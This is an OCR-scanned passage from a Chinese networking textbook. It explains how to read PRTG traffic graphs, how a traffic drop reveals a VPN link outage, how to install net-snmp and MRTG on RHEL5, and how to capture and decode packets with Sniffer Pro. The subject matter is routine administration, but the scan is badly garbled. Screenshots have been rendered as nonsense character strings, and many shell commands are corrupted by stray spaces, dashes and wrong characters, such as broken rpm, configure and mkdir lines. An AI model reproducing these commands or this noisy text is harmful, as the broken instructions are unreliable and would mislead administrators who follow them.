在 如 图 7. 32 所 示 的 主页 面 中 ,默认 显示 了 所 有 的 Sensor 列表 。 要 查看 某 一 个 Sensor 
的 流量 图 ,可 直接 单 击 该 Sensor 链接 ,在 新 的 页 面 中 将 详细 显示 该 Sensor 的 流量 图 和 统计 


信息 ,如 图 7. 34 所 示 。 单 击 Sensor List 链接 ,可 显示 和 返回 到 如 图 7. 32 所 示 的 界面 ,显示 
所 有 的 Sensor 列表 。 
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Jasna ns => 


PRTG Traffic Grapher oring Results 


GO- [© ttto:/192.168.168.15:8080/0gin.htm z] || 
XAD MRO SEV BERW IAD EMW 


SPRER (E PRTG Traffic Grapher - Monitoring Results - PRTG Traf. 


ED PRTG Traffic Grapher PAESSLER 


Refresh [Z] eoff e1ss ©60s esmin 


RN 
Ú 


View PRTG Traffic Grapher > Login 
Sensor List 


Coston Graphs Welcome to PRTG Traffic Grapher! 


Events 
Sensor Data 


Please log in! 
Username: 
Admin Contact TESA ES 
Homepage 


Login 


2010-12-10 14:59:18 


图 7.31 流量 监控 网 站 登录 页 面 


[SPRTG Monitoring 


go- @ http://192.168.168.15:8080/sensorist.htm z] 加 四 
XO WRO FEV RARA IAD WR) 
Y RK — (D PRTG Traffic Grapher - Monitoring Results - PRTG Traf... 


(Ë#) PRTG Traffic Grapher 
g Logged n as admn [ETZI] Retesh: eon es 


View Grapher > A Sensors 


* Sensor List 


Custom Graphs PRTG Traffic Grapher 


Events 
Sensor Data All Sensors z: 


5 S8505 m 
Display, E S8505(GigabtEthernet2/1/11 肖 | 合 川 校区 VPN 40,272 lbtsecond 回回 四 
* Live Graphs 


E S8505 (GigabtEthernet2/1/13)To_OMZ_Frewal 630 Kousecond DDO 
foury Averages E S8505 (GigabitEtherne2 n6 SA RHO 370,889 kbtlsecond 回回 四 
Biri E) S8505(GigabtEthernet2120 F PETA 57,59% btsecond MEDO 
E S8505(GigabtEthernet2/120) To_ 电 信 VPN 1.023 kbsecond 回国 四 
Show Al Graphs E $3505(GigabaEthernet21131) To_ 联 通 VPh 14 Kousecond DEO 
Hide All Graphs F S8505(GigabtEthernet2/1/22) To_ 联 通 无 线 AC 3 kot/second 网 图 加 
E S8505 (GigabitEthemets i BE RARE 6,040 kowsecond 回回 
Tag Filter 田 $6505(GgabtEthemmet3/12 肌 | PE 26,962 koisecond 回国 加 
States E S8505(GigabtEthernet3/1 3) RITE 4,754 kbtsecond 回回 加 
Error (0) S8505(GigabtEthernet3/1/4) 到 图 书馆 2.260 kbwsecond 回国 四 
O E 58505 (GigabiEthemet3/15) 到 教学 楼 2.277 kbtsecond 回回 中 
"ws E S8505 IGiabiEthernet2/16) 到 1 号 学 生 奏 售 81,125 Kosecond 回国 四 
ES 58505 (GoabEmernety17) 到 5 号 学 生 奏 全 116.372 lbtsecond 回回 四 
RE E sas0s(GeabtEthemnetar1) BEP ETE 84,042 tbtsecond 回回 四 
Packet Sniffer (0) E S8505(GgabtEihernet/19 示 |3 号 学 生 入 合 70,825 kot/second 回国 加 
SP omon (9 E S8505(GigabtEthemet/1/10 BIRME 4,105 lbtisecond 回国 加 
SNMP Library (0) E S8505 (GigablEthernet311/11) 到 8 号 学 生 宿舍 14,203 kbtisecond DEO 
SNMP Traffic (19) E S8505(GigabtEthernet3/1/17) RAN 514 kbtisecond 回回 四 过 | 


Custom intervals 


图 7.32 流量 监控 网 站 主页 面 
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Options <i 
$ PRTG Traffic Grapher PAESSLER 


[ Website Customization 


[PRTG Traffic Grapher 
[http //www.paessler.com/pitg/?banner=pito6 


V 9 (© hap: ii92.168.168.15:5060/s=rsor mtmeout=605d=46çoston=39 


XO WKO EEY RERA IAD EMW 
SERR — (D PRTG Traffic Grapher - Monitoring Resuhs - PRTG Traf... 


Waw GT + > Grapa tor 58502 (GasbrEmemetz 1 
Sensor List 


cepmenos S8505 (GigabitEthernet2/1/16) 到 内 网 出 口 


Events 
© SenserDsia Live Graph - 60 Minutes - 30 sec Interval 


Display Mode 
* Graphs 
24 Hours, 5 m Avg 
30 Days, Hourly Avg m30 >” 1450 
365 Days, Daly Avg. 


S min Averages - 24 Hours 


° 
[Homepage | ww oo oo zzo ooa azm oso osmo doo i000 izo i400 


2010-12-10 15:13:33 Hourly Averages - 30 Days 


awaa 200.8 zwaa 


C | 


Data for Sensor $8505 (GigabitEthernet2/1/16) 到 内 网 出 口 
Group: S8505 

192168252254 

ok 

258,728 hbasecond 

2s 


图 7.34 查看 某 个 Sensor 的 流量 图 和 统计 信息 
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在 如 图 7. 32 所 示 的 界面 中 , 若 单 击 每 个 Sensor 前 面 带 “十 ”的 图 标 ,可 展开 显示 其 流量 
图 ,从 而 实现 同时 显示 多 个 流量 图 ,如 图 7. 35 所 示 。 若 单 击 左 侧 菜单 栏 中 的 Show All 
Graphs 按钮 ,将 显示 所 有 Sensor 的 流量 图 。 单 击 Hide All Graphs 按钮 , 则 隐藏 所 有 
Sensor 的 流量 图 。 


(ei 
XPD üe SEV BRAW IAD EMY 
SERR — (D PRTG Traffic Grapher - Monitoring Resuts - PRTG Traf... 


PRTG Traffic Grapher 
All Sensors 
5 $8505 
日 3850S(GoabaEinemeC/11 届 | 合川 要 区 VPN 22.937 Koysecond 回回 四 
Live Graph - 60 Minutes - 30 sec Interval 


asao 
E 58805 (Gigabttmernet211/13)To_DMZ_Frewal 
Live Graph - 60 Minutes - 30 sec Interval 


E S8505 (GlgabtEternel2//15 对 | 内 网 出 口 
Live Graph - 60 Minutes - 30 sec Interval 


图 7.35 在 网 页 中 同时 显示 多 个 流量 图 


单 击 每 个 流量 图 ,将 打开 类 似 图 7. 34 所 示 的 页 面 ,显示 该 Sensor 的 详细 流量 和 统计 
信息 。 

使 用 网 页 显示 流量 图 时 ,在 网 页 顶部 可 设置 流量 图 刷新 的 时 间 间 隔 , 默 认 值 为 60s。 单 
k Refresh 链接 ,可 手工 刷新 流量 图 。 

7. 利用 流量 监控 图 发 现 网 络 故障 

有 了 流量 监控 , 当 网 络 出 现 故障 或 异常 时 .就 会 在 流量 图 上 直观 地 反映 出 来 ,有 助 于 管 
理 员 及 时 发 现 网 络 故障 和 故障 源 的 大 体位 置 。 

根据 图 7. 36 所 示 的 流量 监控 图 ,可 直观 地 看 到 “到 合川 校区 VPN” 链 路 的 流量 突然 直 
线 下 降 到 几乎 为 零 , 这 说 明 该 条 链 路 发 生 了 网 络 故障 , 链 路 数据 业务 中 断 了 。 

在 本 示例 校园 网 络 中 ,用 户 访问 因特网 之 前 必须 进行 登录 认证 ,其 Radius 认证 服务 器 
位 于 合川 校区 ,其 他 校区 通过 该 条 VPN 链 路 ,到 Radius 服务 器 上 进行 上 网 登录 认证 ,由 于 
该 条 链 路 突然 中 断 ,导致 用 户 上 网 认证 失败 , 故 从 流量 图 上 可 发 现 , 各 由 楼 的 流量 也 随 之 下 
降 , 特 别 是 内 网 出 口 流量 急剧 下 降 , 从 500 多 兆 下 降 到 15 兆 左右 。 
224 


第 7 章 计算 机 网 络 安全 管理 


EE ah | Ta titou | Tabe DD | Tee 365 Daye | 


[Sim Im IS IFI 


图 7.36 网 络 链 路 突然 中 断 的 流量 图 


根据 流量 图 , 除 可 发 现 链 路 数据 业务 中 断 故障 之 外 ,对 于 校园 网 内 部 各 幢 楼 或 各 个 网 段 
的 流量 大 小 ,可 直观 地 以 图 形 方式 反映 出 来 有 助 于 管理 员 及 时 发 现 网 内 异常 流量 。 


7.1.2 PEM MRTG 进行 流量 监控 


1. MRTG 简介 
MRTG (Multi Router Traffic Grapher ) 是 一 款 基 于 SNMP (Simple Network 
Management Protocol, 简 单 网 络 管理 协议 ) 协 议 的 网 络 流量 监控 软件 ,是 一 款 开 源 免费 的 流 
量 监控 软件 。 能 通过 SNMP 协议 从 网 络 设 备 (交换 机 或 路 由 器 ) 获 取 流 量 信息 ,并 将 流量 生 
成 PNG 格式 流量 图 ,并 以 Web 网 页 呈现 被 监控 设备 的 实时 端口 流量 图 。 
MRTG 采用 Perl 编写 ,部 分 关键 代码 采用 C 语言 编写 ,是 一 款 开源 软件 ,可 运行 在 
Linux/UNIX、Windows 和 Mac OS 等 操作 系统 平台 。 
MRTG 官方 网 站 为 http://oss. oetiker. ch/mrtg/ ,可 从 官方 网 站 下 载 获 得 该 软件 。 对 
于 Linux/UNIX 平台 ,下 载 扩 展 名 为 . tar. gz 格式 的 软件 包 ; 对 于 Windows 平台 ,下 载 . zip 
格式 的 软件 包 。 目 前 最 新 版 本 为 2. 16. 2, 软 件 包 文件 名 分 别 为 mrtg-2. 16. 2. tar. gz 和 
mrtg-2. 16. 2. zip。 
下 载 地 址 分 别 为 : http://oss. oetiker. ch/mrtg/pub/mrtg-2. 16. 2. tar. gz 和 http:// 
oss. oetiker. ch/mrtg/pub/mrtg-2. 16. 2. zip. 
2. 安装 与 配置 MRTG 
(1) 所 需 安 装 的 软件 包 
MRTG 通过 SNMP 协议 获取 网 络 设备 端口 的 流量 信息 ,并 以 网 页 呈现 网 络 流量 图 , 因 
此 ,在 安装 MR TG 软件 包 之 前 ,应 先 安装 并 配置 好 net-snmp 和 Apache 软件 包 , 并 且 还 要 
安装 libjpeg \libpng freetype zlib 和 libxml2 扩展 库 以 及 GD 图 形 库 。 
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展 库 


(2) 检查 安装 GD Jë 

为 了 使 Linux 系统 支持 绘图 功能 .需要 安装 libjpeg, libpng, freetype,zlib 和 libxml2 扩 
以 及 GD 图 形 库 。 这 些 软件 包 的 安装 均 采 用 rpm 安装 包 安 装 。 

O 检查 与 GD 相关 的 扩展 库 是 否 安装 。 


[root@RHEL5 mrtg] # rpm - qa| grep libjpeg 
libjpeg - devel - 6b - 37 
libjpeg - 6b- 37 
[root@RHEL5 mrtg] # rpm - qa|grep libpng 
libpng- devel - 1.2.10- 7.1.e15_0.1 
libpng- 1.2.10- 7.1.e15_0.1 
[root@RHEL5 mrtg] # rpm - qa| grep freetype 
freetype - 2. 2.1 - 19.e15 
freetype - devel - 2. 2.1 - 19. e15 
[root@RHEL5 mrtg] # rpm - qa| grep zlib 
glib- 1.2:.3-3 

zlib- devel - 1.2.3- 3 
[root@RHEL5 mrtg] # rpm - qa| grep libxml2 
libxml2- 2.6.26- 2.1.2.1 
libxml2- python - 2.6.26 - 2.1.2.1 
libxml2- devel- 2.6.26 - 2.1.2.1 
[root@RHEL5 mrtg] # rpm - qa| grep gd 
gdb- 6.5 - 37. e15 

gdbm— 1.8.0- 26.2.1 

sysklogd - 1. 4.1 - 44. e15 

gdbm— devel - 1.8.0 - 26. 2. 1 


从 输出 可 见 ,gd 和 gd-devel 软件 包 还 没有 安装 。 

@ 安装 GD 图 形 库 。 

gd-devel 软件 包 的 安装 要 依赖 libX11-devel.libXpm-devel 和 fontconfig-devel 软件 包 。 
libX11-devel 软件 包 要 依赖 libXau-devel libXdmcp-devel 和 xorg-x11-proto-devel 软件 


包 , 而 xorg-xll-proto-devel 软件 包 又 要 依赖 mesa-libGL-devel 软件 包 。 


[root@RHEL5 mrtg] # rpm - ivh libXau - devel - 1. 0. 1 - 3. 1. i386. rpm 


以 下 4 个 软件 包 存在 相互 依赖 关系 ,因此 ,在 rpm 安装 命令 中 同时 指定 这 些 要 安装 的 


软件 包 , 各 软件 包 之 间 用 空格 进行 分 隔 。 
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[root@RHEL5 mrtg]# rpm - ivh mesa- libGL- devel- 6.5. 1 - 7. 5. e15. i386. rpm \ 
< xorg- x11 - proto - devel - 7.1 - 9. fc6. i386. rpm libXdmcp - devel - 1.0. 1 - 2. 1. i386. rpm \ 
< 1ibX11 - devel ~ 1.0.3 - 9. e15. i386. rpm 

[root@RHEL5 mrtg] # rpm - ivh fontconfig- devel - 2.4. 1 - 7. e15. i386. rpm 
[root@RHEL5 mrtg] # rpm - ivh libXpn - devel - 3. 5. 5 - 3. i386. rpm 

[root@RHEL5 mrtg] # rpm - ivh gd- devel- 2. 0.33 - 9. 4. e15_1. 1. i386. rpm 
[root@RHEL5 mrtg] # rpm - qa| grep gd 

gdb- 6.5 - 37. e15 

gd- 2.0.33- 9.4.el15_1.1 

gd- devel- 2. 0.33- 9.4.e15_1.1 

gdbm- 1.8.0- 26.2.1 

sysklogd - 1. 4.1 - 44. e15 
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gdbm — devel — 1.8.0— 26. 2. 1 
(3) 检查 并 安装 和 配置 SNMP 
(D 查询 是 否 已 安装 net-snmp 软件 包 。 


[root@RHEL5 ~] # rpm - qa| grep snmp 
net - snmp- libs— 5.3.1 - 24.e15 


从 输出 可 见 ,目前 net-snmp 软件 包 还 未 安装 。 

© 安装 net-snmp 软件 包 。 为 使 Linux 系统 支持 SNMP 协议 ,应 安装 net-snmp 软件 包 。 
该 软件 包 的 安装 需要 依赖 libsensors. so. 3 库 文件 ,该 库 文件 由 Im_sensors 软件 包 提供 。 

下 面 假设 安装 所 需 的 软件 包 均 存放 在 一 /linuxsoft/mrtg 目录 中 。 


[root@RHEL5 ~ ] # cd linuxsoft/mrtg 
[root@RHEL5 mrtg] # rpm - ivh lm sensors— 2.10.0— 3.1. i386. rpm 
[root@RHEL5 mrtg] # rpm - ivh net - snmp- 5.3.1 - 24. e15. i386. rpm 


© 配置 snmp 软件 包 。 为 使 MRTG 能 通过 SNMP 协议 读 取 到 网 络 设备 的 各 端口 的 网 
络 流量 信息 ,需要 对 net-snmp 的 /etc/snmp/snmpd. conf 配置 文件 作 以 下 修改 。 

[root@RHEL5 mrtg] # vi /etc/snmp/snmpd. conf 

a. 找到 以 下 配置 项 ,将 前 面 的 *# 六 ?去掉 ,启用 该 配置 项 。 

# view mib2 included .iso.org.dod.internet.mgmt.mib- 2 fc 

b. 找到 以 下 配置 项 ,将 其 中 的 “systemview” 修 改 为 “mib2”。 


access notConfigGroup "" any noauth exact systemview none none 
即 修改 为 : access notConfigGroup "" any noauth exact mib2 none none 


c,， 在 第 四 步 所 修改 的 配置 项 之 前 ,添加 以 下 配置 项 。 
view systemview included .1.3.6.1.2.1.2 

编辑 修改 好 后 ,存盘 退出 vi 编辑 器 o 

® 启动 snmpd 服务 。 


[root@RHEL5 mrtg] # service snmpd start 
Starting snmpd: [ OK ] 


© 设置 snmpd 服务 为 自 启动 。 


[root@RHEL5 mrtg] # chkconfig -- level 3 snmpd on 

[root@RHEL5 mrtg] # chkconfig -- list|grep snmpd 

snmpd QO:off 1:0off 2:0ff 3:on 4:off 5:off 6:off 

(4) 安装 MRTG 

O 获得 MRTG 软件 包 。 

[root@RHEL5 mrtg] # wget http: //oss. oetiker.ch/mrtg/pub/mrtg- 2. 16.2. tar. gz 
@ RER MRTG., 


GD 图 形 库 和 相关 的 扩展 库 采 用 rpm 格式 的 安装 包 安装 , 库 文件 和 头 文件 安装 在 系统 
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默认 的 /usr/lib 和 /usr/include 目录 中 。 在 编译 配置 MRTG 时 ,不 用 再 指定 库 文件 和 头 文 
件 的 位 置 。 如 果 采 用 源 代 码 编译 安装 GD 库 和 相关 的 扩展 库 , 若 不 是 安装 在 /usr/lib 和 /usr/ 
include 目录 下 , 则 在 编译 配置 MRTG 时 ,应 使 用 --with-gd-lib、--with-gd-inc、--with-z-inc、 
--with-z-lib--with-png-inc 和 --with-png-lib 配置 参数 项 ,分别 指定 这 些 库 文 件 和 头 文件 的 
安装 位 置 。 

下 面 将 mrtg 编译 安装 在 /lamp/mrtg 目录 中 。 

[root@RHEL5 mrtg] # tar zxvf mrtg- 2.16.2. tar. gz 

[root@RHEL5 mrtg] # cd mrtg- 2.16.2 

[root@RHEL5 mrtg- 2.16.2]#./configure -- prefix = /lamp/mrtg 


[root@RHEL5 mrtg- 2. 16.2] # make 
[root@RHEL5 mrtg- 2. 16.2] # make install 


@ 查询 编译 安装 后 的 目录 文件 。 


[root@RHEL5 mrtg - 2.16.2]# cd /lamp/mrtg 

[root@RHEL5 mrtg] # ls 

bin lib share 

[root@RHEL5 mrtg] # ls bin 

cfgmaker indexmaker mrtg mrtg- traffic- sum rateup 

(5) 配置 网 络 设备 SNMP 团体 名 

对 于 要 进行 流量 监控 的 网 络 设备 ,需要 配置 其 SNMP 团体 名 ,配置 方法 参阅 7.1.1 小 节 。 

(6) 配置 MRTG 

O 生成 流量 监控 配置 文件 。 要 对 交换 机 或 路 由 器 的 各 端口 的 网 络 流量 进行 监控 ,首先 
要 生成 针对 该 网 络 设备 的 监控 配置 文件 (. cfg)。 

生成 监控 配置 文件 ,使 用 cfgmaker 程序 来 实现 。 在 生成 配置 文件 时 ,需要 该 网 络 设备 
的 IP 地 址 。 其 IP 地 址 可 以 是 该 设备 上 的 任意 一 个 IP 地址 ,比如 该 设备 上 的 任意 一 个 
VLAN 接口 地 址 或 者 是 某 个 三 层 端口 的 卫 地 址 。 

下 面 以 监控 某 凡 楼 的 汇聚 层 交 换 机 的 网 络 流量 为 例 , 介 绍 其 配置 方法 。 假 设 该 台 三 
层 交 换 机 的 某 一 个 VLAN 的 接口 地 址 为 192. 168. 168. 1 , 则 可 用 该 IP 地 址 来 代表 该 网 
络 设备 。 生 成 的 配置 文件 存放 在 /lamp/apache2/htdocs/mrtg/cfg 目录 中 ,MRTG 的 流量 
监控 网 页 的 发 布 目录 为 /lamp/apache2/htdocs/mrtg, 则 生成 流量 监控 配置 文件 的 操作 命 
令 为 : 

[root@RHEL5 mrtg] # mkdir — p /lamp/apache2/htdocs/mrtg/cfg 

[root@RHEL5 mrtg] # cd bin 

[root@RHEL5 bin] # . /cfgmaker public@192.168.168.1 -- global N 

> "workdir:/lamp/apache2/htdocs/mrtg" —— output /lamp/apache2/htdocs/mrtg/cfg/mrtg168.cfg 

--output 参数 用 于 指定 生成 的 配置 文件 。 

© 编辑 监控 配置 文件 。 使 用 vi 编辑 修改 mrtg168. cfg 文件 ,在 文件 的 末尾 添加 
“runasdaemon:yes”, 使 其 以 守护 进程 方式 运行 。 


[root@RHEL5 bin] # vi /lamp/apache2/htdocs/mrtg/cfg/mrtg168. cfg 


编辑 修改 好 后 ,存盘 退出 vi. 
228 


第 7 章 计算 机 网 络 安全 管理 


@ 以 后 台 守护 进程 方式 运行 MRTG .时刻 监视 设备 的 端口 流量 。 

[root@RHEL5 bin] # env LANG = C . /mrtg /lamp/apache2/htdocs/mrtg/cfg/mrtg168. cfg & 

Daemonizing MRTG ... 

正式 运行 时 ,要 将 该 命令 添加 到 /etc/rc. local 配置 文件 中 ,MRTG 程序 要 使 用 绝对 路 径 。 

@ 生成 网 络 设备 的 流量 监控 网 页 。 流 量 监控 配置 文件 生成 ,并 启动 对 应 的 监控 守护 进 
程 后 , 接 下 来 就 可 生成 对 应 的 流量 监控 网 页 ,以 实现 用 网 页 来 呈现 流量 监控 图 形 。 

[root @ RHEL5 bin] # ./indexmaker -一 output /lamp/apache2/htdocs/mrtg/index. htm /lamp/ 

apache2/htdocs/mrtg/cfg/mrtg168. cfg 

执行 以 上 命令 后 ,就 会 在 /lamp/apache2/htdocs/mrtg 目录 中 生成 index. htm 网 页 文 
件 。 访 问 该 网 页 , 即 可 实时 观察 到 该 网 络 设备 的 各 端口 的 网 络 流量 。 

另外 ,在 生成 网 页 时 ,还 可 使 用 --title 参数 项 来 指定 所 生成 的 网 页 的 标题 。 

若 有 更 多 的 网 络 设备 需要 进行 流量 监控 ,可 用 同样 的 方法 生成 对 应 的 流量 监控 配置 文 
件 和 对 应 的 流量 监控 发 布 网 页 。 各 网 页 的 名 称 不 要 相同 。 

3. 使 用 MRTG 监控 网 络 流量 

经 过 以 上 配置 并 生成 index. htm 网 页 之 后 ,通过 访问 index. htm 网 页 , 即 可 查看 到 被 监 
控 设 备 (IP 地 为 192. 168. 168. 1 的 交换 机 ) 的 各 端口 的 网 络 流量 ,如 图 7. 37 所 示 。 被 监控 
设备 的 各 个 端口 的 网 络 流量 ,以 流量 图 的 方式 呈现 出 来 。 单 击 某 一 个 流量 图 ,还 可 进一步 显 
示 该 端口 的 详细 流量 信息 ,如 图 7. 38 所 示 。 


MRTG Index Page 


Trafic Analysis for 514 - zhonghelou 


PHT IO DEPT SZ SSES PT 
Traffic Analysis for 1282 — zhonghelou Traffic Analysis for 1410 — zhonghelou 
Lea BUH HL, RI 


Lal š: í m 


出 Re efor (W190 169 160.1154 Mal COO O ai 


图 7.37 被 监控 设备 各 端口 的 网 络 流量 
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Description: Ethernet0/2 
Type: — ethernetCsmacd (6) 
Name: Ethemet0/2 

Max Speed 12 5 MBytes/s 


The statistics were last updated Tuesday, 21 April 2009 at 23:48, 
at which time 'zhonghelou' had been up for 371 days, 4:56:13 


`Daily' Graph (S Minute Average) 


22 20 16 16 14 12 10 8 6 4 2 0 22 20 18 16 


Max Average Current 
In 249KB/s02%) 18.1KB/s01%) 249 KB/s (0.2%) 
Out 962KB/s03%) SB/s O40) 962KB/s 03%) 


`Weekly' Graph (30 Minute Average) 
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图 7.38 查看 某 一 端口 的 详细 流量 信息 


7.2 使 用 Sniffer 捕 包 分 析 


7.2.1 Sniffer 简介 


Sniffer 是 NAI 公 司 推出 的 一 款 协 议 分 析 软 件 ,具有 强大 的 网 络 捕 包 、 解 码 和 协议 分 析 
功能 ,常用 于 通过 捕 包 分 析 来 诊断 网 络 故障 。 其 功能 主要 有 如 下 几 项 。 

(1) 捕获 网 络 报 文 以 进行 详细 分 析 。 

(2) 利用 专家 分 析 系 统 诊断 网 络 故 障 。 

(3) 实时 监控 网 络 活动 和 网 络 性 能 。 

(4) 收集 网 络 利用 率 和 错误 等 信息 。 

本 节 以 Sniffer 4. 70. 530 版 本 为 例 , 介 绍 Sniffer 的 安装 和 使 用 方法 。 


7.2.2 安装 Sniffer 


双击 Sniffer 安装 程序 文件 ,打开 安装 向 导 。 按 默认 设置 ,直接 单 击 Next 按钮 进行 安 
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装 。 安 装 完毕 后 ,将 对 产品 进行 注册 。 按 要 求 输入 用 户 名 、 公 司 名 和 E-mail 地 址 等 信息 , 然 
后 单 击 “ 下 一 步 ?按钮 。 接 下 来 将 要 求 输入 用 户 的 地 址 ,城市 名 称 ` 国 家 ,邮政 编码 ,电话 号 码 
等 联系 方式 ,输入 完毕 后 , 单 击 下 一 步 " 按 钮 。 在 接 下 来 的 对 话 框 中 ,选择 获得 该 产品 信息 的 
途径 ,然后 输入 产品 的 序列 号 ,并 单 击 “下 一 步 ?按钮 。 此 时 将 打开 如 图 7. 39 所 示 的 对 话 框 。 


E Sniffer Pro User Registration xj 


If you are connecting to the Internet through 
dial-up networking, you may wish to connect now. 


If you are connecting over a local area network, you 
may need to connect through a proxy. Please consult 
your system administrator. 


If you are unable to connect to the Internet, your 
registration information can be printed and saved. 


G Direct Connection to the Internet 


C Connection to the Internet through a Proxy 
Configure | 


C Hot connected to ta or dial-up. 
int à fax opti 


《< 上 一 步 @) 取消 | 


图 7.39 选择 注册 连接 方式 


此 时 选择 最 后 一 个 选项 ,然后 单 击 " 下 一 步 " 按 钮 ,最 后 再 单 击 “ 完 成 "按钮 ,结束 注册 向 
导 。 安 装 完成 后 ,重新 启动 计算 机 系统 使 Sniffer 生效 即 可 运行 。 


7.2.3 使 用 Sniffer 进行 捕 包 分 析 


1. 设置 捕获 报 文 的 网 卡 

在 使 用 Sniffer 软件 之 前 ,应 首先 设 党 指定 通过 哪 一 块 网 卡 来 捕获 网 络 报 文 。 启 动 
Sniffer 软件 之 后 ,依次 选择 File-> Select Settings 菜单 项 ,此 时 将 打开 如 图 7. 40 所 示 的 对 
话 框 。 

若 计算 机 上 安装 有 多 块 网 卡 , 则 必须 选择 用 
于 捕获 报 文 的 网 卡 。 若 计算 机 本 身 只 有 一 块 网 saet satine | 
卡 ,Sniffer 会 自动 选择 该 网 卡 作为 捕获 报 文 的 网 zpr 
卡 。 设 置 好 网 卡 后 ,Sniffer 的 主 界面 如 图 7. 41 immo -| 
所 示 。 ==] 

图 7.41 中 的 3 个 仪表 盘 分 别 显示 了 网 络 的 MH 
使 用 率 、 每 秒 的 报 文 数量 和 产生 的 错误 数量 。 

2. 捕获 网 络 报 文 

当 网 络 出 现 流量 异常 而 又 无 法 诊断 出 网 络 
故障 的 原因 时 ,可 通过 捕 包 分 析 来 查找 和 分 析 网 
络 故 障 的 原因 ,为 网 络 故障 的 最 终 处 理 提供 解决 的 方向 和 依据 。 

对 报 文 的 捕获 通过 工具 栏 中 的 报 文 捕获 面板 来 实现 ,如 图 7. 42 所 示 。 


Current mediun Ethernet 802_3 
Line, 100 Mbps 


图 7.40 选择 用 于 捕获 报 文 的 网 卡 


Jisan ns == 


Sniffer Portable - Local, Ethernet (Line speed at 100 Mbps) = = D| xj 
Ele Montor Capture Display Tools Database window Help 


ETET IT 
号 | 日 | 82| @|=|2|e|sləlel@j 2 el e| 


G ShotTerm C Long Term 


14:49:30 


O Detail Errors 
O Size Distribution 


For Help, press F1 @ hi m í Ale 4 


图 7.41 Sniffer 主 界面 


报 文 捕获 面板 从 左 至 右 , 其 功能 分 别 是 开始 捕获 = 
报 文 .暂停 捕获 、 停 止 捕获 .停止 捕获 并 查看 、 捕 获 查 ;| "| SEIE Ñ| 
看 .设置 捕获 过 滤 条 件 。 I 

单 击 报 文 捕获 面板 中 的 开始 捕获 按钮 . 即 可 开始 Eee MAMER 
对 报 文 的 捕获 。 若 要 在 捕获 过 程 中 即时 查看 捕获 的 报 文 数量 ,可 在 捕获 之 前 依次 选择 
Capture—-Capture Panel 菜单 项 ,打开 捕获 面板 ,然后 再 开始 捕获 ,这 样 在 捕获 面板 的 仪表 
中 就 可 实时 显示 所 捕获 的 报 文 数量 ,如 图 7. 43 所 示 。 


图 7.43 查看 报 文 的 捕获 数量 


单 击 “ 停 止 并 查看 ”按钮 ,或 者 先 停止 捕获 .然后 再 单 击 “ 捕 获 查 看 ”按钮 ,此 时 将 打开 如 
图 7. 44 所 示 的 专家 分 析 系 统 窗口 。 

WH Ze fB Objects 按钮 .可 查看 到 各 主机 的 相关 信息 ,如 图 7.45 所 示 。 

E 击 底部 的 Decode 按钮 ,可 切换 到 对 所 捕获 报 文 的 解码 分 析 界 面 ,如 图 7. 46 所 示 。 整 


得 
È 
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个 解码 分 析 界 面 划分 成 上 .中 .下 3 个 区 域 , 在 顶部 的 列表 框 中 可 选择 要 解码 的 报 文 , 选 中 
后 ,将 在 中 间 区 域 显 示 该 报 文 的 解码 (协议 分 析 ) .在 底部 区 域 显示 的 是 报 文 的 二 进 制 数据 。 


Exp 


EERE 


th 


zizi 
J | @| s| 


图 7.44 Sniffer 的 专家 分 析 系 统 


685466A3477B4D6 ( [192,168,168,129] ) [192.168.168.255] 
685466A34778408 ( [192.168.168.129]) [192.168.168.255] — UDP 
CQDD-LIXIN ( [192.168.168.18]) [192.168.168.255] — UDP 
CQOD-LIXIN ( [192.168.168.18]) [192.168.168.255] — UDP 
KINGO ( [192.168.168.14] ) [192.168.168.255] — UDP 
PC-20100207XTFQ [192.168.168.57] ) [255.255.255.255] — UDP 
PC-20100207XTFQ ( [192,168,168,57]) [192.168.168.255] — UDP 
PC-20100207XTFQ ( [192.168,168.57]) [192.168.166.255] UDP 
PC-20100207XTFQ ( [192.168,168.57] ) [255.255.255.255] UDP 
[113.108.80.217] [192,168,168,15] UDP 
[192,168,168,100] [192.168.168.255] UDP. 
[192.168.168.102] [192.168.168.255] — UDP] 

` 


Edsnifi: Decode, 


图 7.45 查看 各 主机 的 连接 情况 


5/968 Ethernet Frames 


Find nane CODD DDMIS:20> 


C ID=52373 OP=QUERY NAME=VORKGROUP<1B> |92 
Get sysUpTine 
GetReply sysUpTine = 165432829 ticks 


ARP/RARP frame —— 


Hardvare type = 1 (10Mb Ethernet) 
Protocol type = 0800 (IP) 

Length of hardvare address = 6 bytes 
Length of protocol address = 4 bytes 


X Expert À Decode A Matrix A Host Table À Protocol Dist.) Statistics / 


图 7.46 解码 报 文 
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单 击 Matrix 按钮 ,可 切换 到 对 所 捕获 报 文 的 图 形 分 析 界 面 , 如 图 7. 47 所 示 。 


Sniffer Portable - Local, Ethernet (Line speed at 100 Mbps) - [Snif1: Matrix, 968 Ethernet Frames] =I x] 


ZE Fie Montor Capture Display Tools Database window Help =la x 
o| ul s| || 及 | rssw =] 

|| ë|=| S|; elmiəlel] 2| el e 
e eala) | | z 


R Traffic Map 


Eper ADsso6s \ matri: A Host Tabie A Protocol Dist. A Statisties 


For Help, press FL &@ n pA are 


图 7.47 对 捕获 报 文 的 图 形 分 析 之 Traffic 图 


单 击 图 7. 48 中 工具 栏 中 的 相关 按钮 ,可 实现 以 不 同 的 图 形 模式 对 所 捕获 的 报 文 进行 
图 形 化 分 析 显 示 。 若 单 击 加 按钮 . 则 按 流 量 大 小 显示 排名 前 10 位 的 连接 ,如 图 7. 49 


所 示 o 


图 7.48 捕获 报 文 的 图 形 分 析 工 具 面 板 


Host Table, Protocol Dist 和 Statistics 界面 用 于 显示 所 捕获 报 文 的 相关 统计 信息 

3. 按 条 件 对 报 文 进行 捕获 

前 面 介绍 的 捕获 报 文 方法 ,是 在 一 段 时 间 内 对 网 络 中 的 所 有 报 文 进 行 捕获 。 若 要 按 条 
件 对 指定 的 报 文 进行 捕获 ,应 在 捕获 之 前 设置 对 报 文 的 捕获 过 滤 条 件 
单 击 工具 栏 中 的 怖 | 按钮 , 即 可 打开 过 滤 条 件 设置 对 话 框 ,然后 选择 Address 选项 卡 , 切 
换 到 按 地 址 设置 过 滤 条 件 的 设置 页 面 ,如 图 7. 50 所 示 
在 Address 下 拉 列 表 框 中 ,车 选择 Hardware 选项 , 则 按 源 MAC 和 目的 MAC 地 址 设 
置 过 滤 条 件 。MAC 地 址 输入 方式 为 十 六 进 制 连续 输入 ,如 00010297997B。 若 选择 IP 选 
项 , 则 按 源 IP 地 址 和 目的 IP 地 址 进行 捕获 
Data Pattern 选项 卡 用 于 设置 按 任意 捕获 条 件 进行 过 滤 : Advanced 用 于 设置 要 捕获 报 
